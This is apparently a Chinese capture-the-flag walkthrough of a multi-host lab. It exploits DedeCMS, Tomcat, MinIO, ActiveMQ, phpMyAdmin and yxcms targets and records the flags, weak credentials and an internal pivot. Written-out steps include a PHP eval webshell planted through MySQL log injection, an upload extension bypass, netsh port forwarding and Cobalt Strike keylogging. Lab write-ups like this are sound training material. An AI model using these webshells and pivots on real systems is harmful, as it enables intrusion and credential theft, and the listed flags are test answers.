用nmap扫描靶机1进行主机发现
已知靶机1的主机在172.16.17.0/24下
扫描结果如下
根据扫描结果看开启的服务怀疑172.16.17.177是靶机1
所以外网靶机1ip为172.16.17.177
浏览器访问172.16.17.177页面得到如下
我们知道织梦cms系统默认管理路径是dede,登陆管理后台可以通过地址172.16.17.177/dede/index.php进行访问
进入到后台管理登录界面
用bp爆破一下
得到账号是admin,密码是1q2w3e4r
成功登录后进入到后台界面
在页面的最上方得到
flag2{add6bb58e139be103324d04d82d8f545}
在这里把会员功能打开
在会员中心这里注册一个会员
在会员中心--内容中心--个人空间--文章发表下,发现了文件上传漏洞
在详细内容下
发现可以直接上传到服务器上,我们直接就上传个一句话木马文件上去
可以看到是不被允许的,我们bp抓包一下看看
在这里我们将我们上传的1234.png修改为1234.png.p*hp
详情见wp:https://www.cnblogs.com/punished/p/14743203.html
可以发现成功回显路径/uploads/allimg/231128/1-23112R11F0258.php
可以用蚁剑连接一下
flag3{cf1e8c14e54505f60aa10ceb8d5d8ab3}
同时我们也发现了数据库配置文件
详情见wp:织梦DEDECMS数据库配置文件在哪?如何修改配置信息_织梦数据库配置文件_二胖的窝的博客-CSDN博客
织梦数据库配置文件在/data/common.inc.php
我们知道数据库用户为root,密码为root1234
找到
flag1{11e0eed8d3696c0a632f822df385ab3c}
接下来找内网的靶机
先看看我们是什么权限,我们用whoami命令
可以看到我们就是管理员权限,不需要再提权了
找到内网ip为192.168.31.20
直接fscan开扫
我们将fscan.exe上传到蚁剑连接的网站目录上去
-fscan64 -h 192.168.31.20/24
扫描结果如上
说明存在内网靶机192.16.31.131
我们端口转发一下
netsh interface portproxy add v4tov4 listenport=88 connectaddress=192.168.31.131 connectport=80
查看是否设置成功
netsh interface portproxy show all
端口设置成功
访问88这个端口,访问成功
192.168.31.131:80
提示了是Apache Tomcat/8.5.19,直接搜漏洞就行
发现是文件上传漏洞
访问mannager app
发现拒绝连接,说明我们还没有权限去访问
知识点见:一文了解Tomcat/8.5.19文件上传漏洞复现_tomcat8.5漏洞-CSDN博客
上传jsp一句话木马
复制到bp的请求正文里
上传成功
且能访问到
但是我无论怎么尝试都连接不上去
放弃了
重新看一篇【Tomcat-8.5.19】文件写入漏洞_apache tomcat/8.5.19_夭-夜的博客-CSDN博客
上传成功
输入命令ls /
直接cat /flag
flag11{8f72e28063c30c7468fb6af4653f4f9c}
再访问另外一个端口
192.168.31.131:9001
netsh interface portproxy add v4tov4 listenport=7777 connectaddress=192.168.31.131 connectport=9001
百度搜了一下【漏洞复现】CVE-2023-28432 MinIO集群模式信息泄露漏洞_minio漏洞-CSDN博客
啥也没有
用户名密码分别为minioadmin,minioadmin-vulhub
成功登录进去
在这里找到了个flag.png
找错了,在其他地方找到了flag12
flag12{f27285a98355e3cd848425a66da96de4}
转战第三个端口
192.168.31.131:8080
看见Rememebr me确定是shiro框架
flag10{6dfdc384d6025b2ab9b71ec15971aa11}
第四个端口
192.168.31.131:8161
cs连接的默认端口为50050
先设置交互时间sleep 5
抓取明文密码keylogger
查看密码凭证
文件浏览得到
下载下来即可得到flag4文件
flag4{194f9987498c1cf5a795d83caa1478141}
详情见:工具之使用教程Neo-reGeorg_neoregeorg-CSDN博客
先生成木马
上传到网站根目录下面
访问一下没有报错
这里就可以直接访问得到了
这里涉及到ActiveMQ 任意文件写入漏洞(CVE-2016-3088)复现_cve-2016-3088 poc-CSDN博客
admin/admin登录成功
需要管理员权限,访问http://192.168.31.131:8161/admin/test/systemProperties.jsp
上传一句话木马并移动到web目录下的api文件夹(/opt/activemq/webapps/api/shell.jsp
)中
flag9{d7d23c7313dab36293618143c4fc256f}
根据之前的dirsearch扫描得到第二台靶机
所以外网第二台靶机ip为172.16.17.134
访问一下得到
我们用dirsearch扫描一下看看
发现里面有个l.php
访问一下看看
这里有个mysql连接
直接用弱口令root/root
在之前的扫描结果,我们知道靶机2下面还有个/phpMyAdmin/目录
访问一下看看,用我们上面得到的连接数据库的用户和密码
成功进入
flag7{938a3d1529acebf5dd495b65031722e3}
翻翻数据库里面的表
又找到了flag5
flag5{47422276348bf7c7c666a4101a89eeb5}
在这里打算直接上一句话木马的
结果不行
那就在这里试试
发现也不行
那就尝试日志注入
set global slow_query_log=1;
//开启日记功能
执行成功
SET GLOBAL slow_query_log_file='C:\Users\xxx\Desktop\1.php';
//设置日志存储路径
执行sql语句
select '<?php eval($_POST[H])?>' ;
啥也没有
我们在之前的dirsearch扫描目录下发现了靶机2还有个shell.php的目录,访问一下
复制粘贴到记事本中查找flag的字段,联系上下文,感觉这些代码像是查询数据库的语句,全篇一直都是newyxcms
几次尝试以后发现靶机2还有个yxcms的目录,访问一下
公示信息这里给了提示
登录
成功进入到后台
在页面处发现了flag6
flag6{0a0dbee0d2e018e43f806d52483dfb77}
在前台模版下发现了文件上传点
根据提示,我们知道我们上传的文件会在default的文件夹下,但是我们不知道路径
用我修改过字典的御剑工具扫描网站
得到网站下面有个beifen.rar
访问一下直接就下了一个rar 经过查找default文件的位置
我们知道文件上传的路径点在\yxcms\protected\apps\default\view\default
那就上传个一句话木马上去看看
蚁剑连接一下看看
url连接地址为
http://172.16.17.134/yxcms/protected/apps/default/view/default/hack.php
打开虚拟终端
用dir /s /b flag8.txt命令来寻找flag8.txt的位置
在这里发现了flag8.txt
flag8{0ddacf356d025a8e6068b42ac537127e}
知识点
- 什么是phpstudy探针
phpStudy 探针 在原先的phpinfo基础上做了一些变化。在开发过程中,我们常常需要服务器的各项配置,而“探针”就是就是用来探测配置的。
--secure-file-priv
选项
这个选项规定了MySQL服务器可以从本地文件系统读取和写入文件的路径
需要了解的有:
1.nmap的使用
2.织梦cms漏洞大全
3.蚁剑连接数据库
4.dirsearch的使用
5.phpstudy探针
6.select 查询之 INTO OUTFILE参数
7.--secure-file-priv
选项
8.日志注入
9.终端下定位文件位置有哪些命令
10.提权以及whoami命令
11.fscan的使用
12.frpc的使用安装
13.Apache Tomcat/8.5.19漏洞
14.Godzilla的安装和使用
15.jsp木马的使用
16.cs的使用